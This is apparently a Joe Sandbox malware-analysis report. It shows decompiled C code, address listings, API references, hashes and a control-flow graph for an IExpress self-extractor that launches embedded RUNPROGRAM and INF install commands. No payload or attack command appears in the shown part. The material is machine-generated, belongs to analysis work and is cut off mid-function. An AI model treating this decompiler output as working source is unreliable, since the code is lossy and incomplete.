                                                                                                                                                                                                                                                							E001044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                							 *0x109124 = 0x80070714;
                                                                                                                                                                                                                                                							goto L62;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							if(_v396 != 1) {
                                                                                                                                                                                                                                                								__eflags = _v396 - 2;
                                                                                                                                                                                                                                                								if(_v396 != 2) {
                                                                                                                                                                                                                                                									_t137 = 3;
                                                                                                                                                                                                                                                									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                                									if(_v396 == _t137) {
                                                                                                                                                                                                                                                										_v304 = 1;
                                                                                                                                                                                                                                                										_v300 = _t137;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L14;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_push(6);
                                                                                                                                                                                                                                                								_v304 = 1;
                                                                                                                                                                                                                                                								_pop(0);
                                                                                                                                                                                                                                                								goto L11;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_v304 = 1;
                                                                                                                                                                                                                                                								L11:
                                                                                                                                                                                                                                                								_v300 = 0;
                                                                                                                                                                                                                                                								L14:
                                                                                                                                                                                                                                                								if(_t127 != 0) {
                                                                                                                                                                                                                                                									L27:
                                                                                                                                                                                                                                                									_t155 = 1;
                                                                                                                                                                                                                                                									__eflags = _t127 - 1;
                                                                                                                                                                                                                                                									if(_t127 != 1) {
                                                                                                                                                                                                                                                										L31:
                                                                                                                                                                                                                                                										_t132 =  &_v280;
                                                                                                                                                                                                                                                										_t76 = E00101AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                                										__eflags = _t76;
                                                                                                                                                                                                                                                										if(_t76 == 0) {
                                                                                                                                                                                                                                                											L62:
                                                                                                                                                                                                                                                											_t77 = 0;
                                                                                                                                                                                                                                                											L63:
                                                                                                                                                                                                                                                											_pop(_t150);
                                                                                                                                                                                                                                                											_pop(_t156);
                                                                                                                                                                                                                                                											_pop(_t128);
                                                                                                                                                                                                                                                											return E00106CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t157 = _v404;
                                                                                                                                                                                                                                                										__eflags = _t149;
                                                                                                                                                                                                                                                										if(_t149 != 0) {
                                                                                                                                                                                                                                                											L37:
                                                                                                                                                                                                                                                											__eflags = _t157;
                                                                                                                                                                                                                                                											if(_t157 == 0) {
                                                                                                                                                                                                                                                												L57:
                                                                                                                                                                                                                                                												_t151 = _v408;
                                                                                                                                                                                                                                                												_t146 =  &_v352;
                                                                                                                                                                                                                                                												_t130 = _t151; // executed
                                                                                                                                                                                                                                                												_t79 = E00103FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                                												__eflags = _t79;
                                                                                                                                                                                                                                                												if(_t79 == 0) {
                                                                                                                                                                                                                                                													L61:
                                                                                                                                                                                                                                                													LocalFree(_t151);
                                                                                                                                                                                                                                                													goto L62;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												L58:
                                                                                                                                                                                                                                                												LocalFree(_t151);
                                                                                                                                                                                                                                                												_t127 = _t127 + 1;
                                                                                                                                                                                                                                                												_v396 = _t127;
                                                                                                                                                                                                                                                												__eflags = _t127 - 2;
                                                                                                                                                                                                                                                												if(_t127 >= 2) {
                                                                                                                                                                                                                                                													_t155 = 1;
                                                                                                                                                                                                                                                													__eflags = 1;
                                                                                                                                                                                                                                                													L69:
                                                                                                                                                                                                                                                													__eflags =  *0x108580;
                                                                                                                                                                                                                                                													if( *0x108580 != 0) {
                                                                                                                                                                                                                                                														E00102267();
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                													_t77 = _t155;
                                                                                                                                                                                                                                                													goto L63;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												_t153 = _v392;
                                                                                                                                                                                                                                                												_t149 = _v388;
                                                                                                                                                                                                                                                												continue;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											L38:
                                                                                                                                                                                                                                                											__eflags =  *0x108180;
                                                                                                                                                                                                                                                											if( *0x108180 == 0) {
                                                                                                                                                                                                                                                												_t146 = 0x4c7;
                                                                                                                                                                                                                                                												E001044B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                												LocalFree(_v424);
                                                                                                                                                                                                                                                												 *0x109124 = 0x8007042b;
                                                                                                                                                                                                                                                												goto L62;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t157;
                                                                                                                                                                                                                                                											if(_t157 == 0) {
                                                                                                                                                                                                                                                												goto L57;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags =  *0x109a34 & 0x00000004;
                                                                                                                                                                                                                                                											if(__eflags == 0) {
                                                                                                                                                                                                                                                												goto L57;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t129 = E00106495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                                											__eflags = _t129;
                                                                                                                                                                                                                                                											if(_t129 == 0) {
                                                                                                                                                                                                                                                												_t146 = 0x4c8;
                                                                                                                                                                                                                                                												E001044B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                                												L65:
                                                                                                                                                                                                                                                												LocalFree(_v408);
                                                                                                                                                                                                                                                												 *0x109124 = E00106285();
                                                                                                                                                                                                                                                												goto L62;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                                											_v404 = _t146;
                                                                                                                                                                                                                                                											__eflags = _t146;
                                                                                                                                                                                                                                                											if(_t146 == 0) {
                                                                                                                                                                                                                                                												_t146 = 0x4c9;
                                                                                                                                                                                                                                                												__eflags = 0;
                                                                                                                                                                                                                                                												E001044B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                                												FreeLibrary(_t129);
                                                                                                                                                                                                                                                												goto L65;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags =  *0x108a30;
                                                                                                                                                                                                                                                											_t151 = _v408;
                                                                                                                                                                                                                                                											_v384 = 0;
                                                                                                                                                                                                                                                											_v368 =  &_v280;
                                                                                                                                                                                                                                                											_t96 =  *0x109a40; // 0x3
                                                                                                                                                                                                                                                											_v364 = _t96;
                                                                                                                                                                                                                                                											_t97 =  *0x108a38 & 0x0000ffff;
                                                                                                                                                                                                                                                											_v380 = 0x109154;
                                                                                                                                                                                                                                                											_v376 = _t151;
                                                                                                                                                                                                                                                											_v372 = 0x1091e4;
                                                                                                                                                                                                                                                											_v360 = _t97;
                                                                                                                                                                                                                                                											if( *0x108a30 != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t144 =  *0x109a34; // 0x1
                                                                                                                                                                                                                                                											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                                											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                                											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t145 =  *0x108d48; // 0x0
                                                                                                                                                                                                                                                											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                                											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t145;
                                                                                                                                                                                                                                                											if(_t145 < 0) {
                                                                                                                                                                                                                                                												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                                												__eflags = _t104;
                                                                                                                                                                                                                                                												_v360 = _t104;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t98 =  *0x109a38; // 0x0
                                                                                                                                                                                                                                                											_v356 = _t98;
                                                                                                                                                                                                                                                											_t130 = _t146;
                                                                                                                                                                                                                                                											 *0x10a288( &_v384);
                                                                                                                                                                                                                                                											_t101 = _v404();
                                                                                                                                                                                                                                                											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                                											if(_t164 != _t164) {
                                                                                                                                                                                                                                                												_t130 = 4;
                                                                                                                                                                                                                                                												asm("int 0x29");
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											 *0x109124 = _t101;
                                                                                                                                                                                                                                                											_push(_t129);
                                                                                                                                                                                                                                                											__eflags = _t101;
                                                                                                                                                                                                                                                											if(_t101 < 0) {
                                                                                                                                                                                                                                                												FreeLibrary();
                                                                                                                                                                                                                                                												goto L61;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												FreeLibrary();
                                                                                                                                                                                                                                                												_t127 = _v400;
                                                                                                                                                                                                                                                												goto L58;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags =  *0x109a40 - 1; // 0x3
                                                                                                                                                                                                                                                										if(__eflags == 0) {
                                                                                                                                                                                                                                                											goto L37;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags =  *0x108a20;
                                                                                                                                                                                                                                                										if( *0x108a20 == 0) {
                                                                                                                                                                                                                                                											goto L37;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t157;
                                                                                                                                                                                                                                                										if(_t157 != 0) {
                                                                                                                                                                                                                                                											goto L38;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_v388 = 1;
                                                                                                                                                                                                                                                										E0010202A(_t146); // executed
                                                                                                                                                                                                                                                										goto L37;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t146 =  &_v280;
                                                                                                                                                                                                                                                									_t108 = E0010468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                                									__eflags = _t108;
                                                                                                                                                                                                                                                									if(_t108 == 0) {
                                                                                                                                                                                                                                                										goto L25;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									__eflags =  *0x108c42;
                                                                                                                                                                                                                                                									if( *0x108c42 != 0) {
                                                                                                                                                                                                                                                										goto L69;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                                									__eflags = _t112 == 0;
                                                                                                                                                                                                                                                									if(_t112 == 0) {
                                                                                                                                                                                                                                                										goto L69;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L31;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t118 =  *0x108a38; // 0x0
                                                                                                                                                                                                                                                								if(_t118 == 0) {
                                                                                                                                                                                                                                                									L23:
                                                                                                                                                                                                                                                									if(_t153 != 0) {
                                                                                                                                                                                                                                                										goto L31;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t146 =  &_v276;
                                                                                                                                                                                                                                                									if(E0010468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                                										goto L27;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L25;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                                									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                										goto L62;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t140 = "USRQCMD";
                                                                                                                                                                                                                                                									L20:
                                                                                                                                                                                                                                                									_t146 =  &_v276;
                                                                                                                                                                                                                                                									if(E0010468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                                										goto L25;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                                										_t153 = 1;
                                                                                                                                                                                                                                                										_v388 = 1;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                                								goto L20;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L26:
                                                                                                                                                                                                                                                						_push(_t130);
                                                                                                                                                                                                                                                						_t146 = 0x104;
                                                                                                                                                                                                                                                						E00101781( &_v276, 0x104, _t130, 0x108c42);
                                                                                                                                                                                                                                                						goto L27;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t130 = "REBOOT";
                                                                                                                                                                                                                                                				_t125 = E0010468F(_t130, 0x109a2c, 4);
                                                                                                                                                                                                                                                				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                                					goto L25;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                0x00103bfd
                                                                                                                                                                                                                                                0x00103bff
                                                                                                                                                                                                                                                0x00103c03
                                                                                                                                                                                                                                                0x00103c03
                                                                                                                                                                                                                                                0x00103c11
                                                                                                                                                                                                                                                0x00103c16
                                                                                                                                                                                                                                                0x00103c19
                                                                                                                                                                                                                                                0x00103c28
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103c30
                                                                                                                                                                                                                                                0x00103c39
                                                                                                                                                                                                                                                0x00103c40
                                                                                                                                                                                                                                                0x00103d13
                                                                                                                                                                                                                                                0x00103d15
                                                                                                                                                                                                                                                0x00103d21
                                                                                                                                                                                                                                                0x00103d26
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103c4f
                                                                                                                                                                                                                                                0x00103c56
                                                                                                                                                                                                                                                0x00103c60
                                                                                                                                                                                                                                                0x00103c65
                                                                                                                                                                                                                                                0x00103c77
                                                                                                                                                                                                                                                0x00103c78
                                                                                                                                                                                                                                                0x00103c7c
                                                                                                                                                                                                                                                0x00103c7e
                                                                                                                                                                                                                                                0x00103c82
                                                                                                                                                                                                                                                0x00103c82
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103c7c
                                                                                                                                                                                                                                                0x00103c67
                                                                                                                                                                                                                                                0x00103c69
                                                                                                                                                                                                                                                0x00103c6d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103c58
                                                                                                                                                                                                                                                0x00103c58
                                                                                                                                                                                                                                                0x00103c6e
                                                                                                                                                                                                                                                0x00103c6e
                                                                                                                                                                                                                                                0x00103c87
                                                                                                                                                                                                                                                0x00103c89
                                                                                                                                                                                                                                                0x00103d4d
                                                                                                                                                                                                                                                0x00103d4f
                                                                                                                                                                                                                                                0x00103d50
                                                                                                                                                                                                                                                0x00103d52
                                                                                                                                                                                                                                                0x00103d9e
                                                                                                                                                                                                                                                0x00103da8
                                                                                                                                                                                                                                                0x00103daf
                                                                                                                                                                                                                                                0x00103db4
                                                                                                                                                                                                                                                0x00103db6
                                                                                                                                                                                                                                                0x00103f4d
                                                                                                                                                                                                                                                0x00103f4d
                                                                                                                                                                                                                                                0x00103f4f
                                                                                                                                                                                                                                                0x00103f56
                                                                                                                                                                                                                                                0x00103f57
                                                                                                                                                                                                                                                0x00103f58
                                                                                                                                                                                                                                                0x00103f63
                                                                                                                                                                                                                                                0x00103f63
                                                                                                                                                                                                                                                0x00103dbc
                                                                                                                                                                                                                                                0x00103dc0
                                                                                                                                                                                                                                                0x00103dc2
                                                                                                                                                                                                                                                0x00103de6
                                                                                                                                                                                                                                                0x00103de6
                                                                                                                                                                                                                                                0x00103de8
                                                                                                                                                                                                                                                0x00103f0b
                                                                                                                                                                                                                                                0x00103f0b
                                                                                                                                                                                                                                                0x00103f0f
                                                                                                                                                                                                                                                0x00103f13
                                                                                                                                                                                                                                                0x00103f15
                                                                                                                                                                                                                                                0x00103f1a
                                                                                                                                                                                                                                                0x00103f1c
                                                                                                                                                                                                                                                0x00103f46
                                                                                                                                                                                                                                                0x00103f47
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103f47
                                                                                                                                                                                                                                                0x00103f1e
                                                                                                                                                                                                                                                0x00103f1f
                                                                                                                                                                                                                                                0x00103f25
                                                                                                                                                                                                                                                0x00103f26
                                                                                                                                                                                                                                                0x00103f2a
                                                                                                                                                                                                                                                0x00103f2d
                                                                                                                                                                                                                                                0x00103fd9
                                                                                                                                                                                                                                                0x00103fd9
                                                                                                                                                                                                                                                0x00103fda
                                                                                                                                                                                                                                                0x00103fda
                                                                                                                                                                                                                                                0x00103fe1
                                                                                                                                                                                                                                                0x00103fe3
                                                                                                                                                                                                                                                0x00103fe3
                                                                                                                                                                                                                                                0x00103fe8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103fe8
                                                                                                                                                                                                                                                0x00103f33
                                                                                                                                                                                                                                                0x00103f37
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103f37
                                                                                                                                                                                                                                                0x00103dee
                                                                                                                                                                                                                                                0x00103dee
                                                                                                                                                                                                                                                0x00103df5
                                                                                                                                                                                                                                                0x00103fad
                                                                                                                                                                                                                                                0x00103fb9
                                                                                                                                                                                                                                                0x00103fc2
                                                                                                                                                                                                                                                0x00103fc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103fc8
                                                                                                                                                                                                                                                0x00103dfb
                                                                                                                                                                                                                                                0x00103dfd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103e03
                                                                                                                                                                                                                                                0x00103e0a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103e15
                                                                                                                                                                                                                                                0x00103ce8
                                                                                                                                                                                                                                                0x00103c9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103c9e
                                                                                                                                                                                                                                                0x00103c56
                                                                                                                                                                                                                                                0x00103d35
                                                                                                                                                                                                                                                0x00103d35
                                                                                                                                                                                                                                                0x00103d3c
                                                                                                                                                                                                                                                0x00103d48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103d48
                                                                                                                                                                                                                                                0x00103c03
                                                                                                                                                                                                                                                0x00103be2
                                                                                                                                                                                                                                                0x00103be7
                                                                                                                                                                                                                                                0x00103bee
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00103C11
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00103CDC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00108C42), ref: 00103D8F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00103E26
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00108C42), ref: 00103EFF
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00108C42), ref: 00103F1F
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00108C42), ref: 00103F40
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00108C42), ref: 00103F47
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00108C42), ref: 00103F76
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00108C42), ref: 00103F80
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00108C42), ref: 00103FC2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                                • API String ID: 1032054927-1973600120
                                                                                                                                                                                                                                                • Opcode ID: 7a82337ef2f627030c68ca06bd5d39a9418a763dcb9741ea19e79606682bbcf0
                                                                                                                                                                                                                                                • Instruction ID: 4cd9ca62a29206803c4f59ffc74dd1096779f1da54dc89d0fc538147ebf7be94
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a82337ef2f627030c68ca06bd5d39a9418a763dcb9741ea19e79606682bbcf0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15B1F2B06083019BE720DF64C945B6B76E8EB94710F104A2EFAE5D65E1DBF4C984CB92
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 141 101ae8-101b2c call 101680 144 101b3b-101b40 141->144 145 101b2e-101b39 141->145 146 101b46-101b61 call 101a84 144->146 145->146 149 101b63-101b65 146->149 150 101b9f-101bc2 call 101781 call 10658a 146->150 151 101b68-101b6d 149->151 159 101bc7-101bd3 call 1066c8 150->159 151->151 153 101b6f-101b74 151->153 153->150 155 101b76-101b7b 153->155 157 101b83-101b86 155->157 158 101b7d-101b81 155->158 157->150 162 101b88-101b8a 157->162 158->157 161 101b8c-101b9d call 101680 158->161 165 101d73-101d7f call 1066c8 159->165 166 101bd9-101bf1 CompareStringA 159->166 161->159 162->150 162->161 175 101d81-101d99 CompareStringA 165->175 176 101df8-101e09 LocalAlloc 165->176 166->165 168 101bf7-101c07 GetFileAttributesA 166->168 170 101d53-101d5e 168->170 171 101c0d-101c15 168->171 173 101d64-101d6e call 1044b9 170->173 171->170 174 101c1b-101c33 call 101a84 171->174 187 101e94-101ea4 call 106ce0 173->187 189 101c50-101c61 LocalAlloc 174->189 190 101c35-101c38 174->190 175->176 181 101d9b-101da2 175->181 178 101dd4-101ddf 176->178 179 101e0b-101e1b GetFileAttributesA 176->179 178->173 183 101e67-101e73 call 101680 179->183 184 101e1d-101e1f 179->184 186 101da5-101daa 181->186 199 101e78-101e84 call 102aac 183->199 184->183 188 101e21-101e3e call 101781 184->188 186->186 191 101dac-101db4 186->191 188->199 210 101e40-101e43 188->210 189->178 198 101c67-101c72 189->198 195 101c40-101c4b call 101a84 190->195 196 101c3a 190->196 197 101db7-101dbc 191->197 195->189 196->195 197->197 203 101dbe-101dd2 LocalAlloc 197->203 204 101c74 198->204 205 101c79-101cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->205 209 101e89-101e92 199->209 203->178 211 101de1-101df3 call 10171e 203->211 204->205 207 101cc2-101ccc 205->207 208 
101cf8-101d07 205->208 212 101cd3-101cf3 call 101680 * 2 207->212 213 101cce 207->213 215 101d23 208->215 216 101d09-101d21 GetShortPathNameA 208->216 209->187 210->199 214 101e45-101e65 call 1016b3 * 2 210->214 211->209 212->209 213->212 214->199 220 101d28-101d2b 215->220 216->220 224 101d32-101d4e call 10171e 220->224 225 101d2d 220->225 224->209 225->224
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00101AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v527;
                                                                                                                                                                                                                                                				char _v528;
                                                                                                                                                                                                                                                				char _v1552;
                                                                                                                                                                                                                                                				CHAR* _v1556;
                                                                                                                                                                                                                                                				int* _v1560;
                                                                                                                                                                                                                                                				CHAR** _v1564;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t48;
                                                                                                                                                                                                                                                				CHAR* _t53;
                                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                                				char* _t57;
                                                                                                                                                                                                                                                				char* _t58;
                                                                                                                                                                                                                                                				CHAR* _t60;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				signed char _t65;
                                                                                                                                                                                                                                                				intOrPtr _t76;
                                                                                                                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                                                                                                                				unsigned int _t85;
                                                                                                                                                                                                                                                				CHAR* _t90;
                                                                                                                                                                                                                                                				CHAR* _t92;
                                                                                                                                                                                                                                                				char _t105;
                                                                                                                                                                                                                                                				char _t106;
                                                                                                                                                                                                                                                				CHAR** _t111;
                                                                                                                                                                                                                                                				CHAR* _t115;
                                                                                                                                                                                                                                                				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00101680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00101A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00101781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
					E0010658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00101680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E001066C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E001066C8(_t115, _t139);
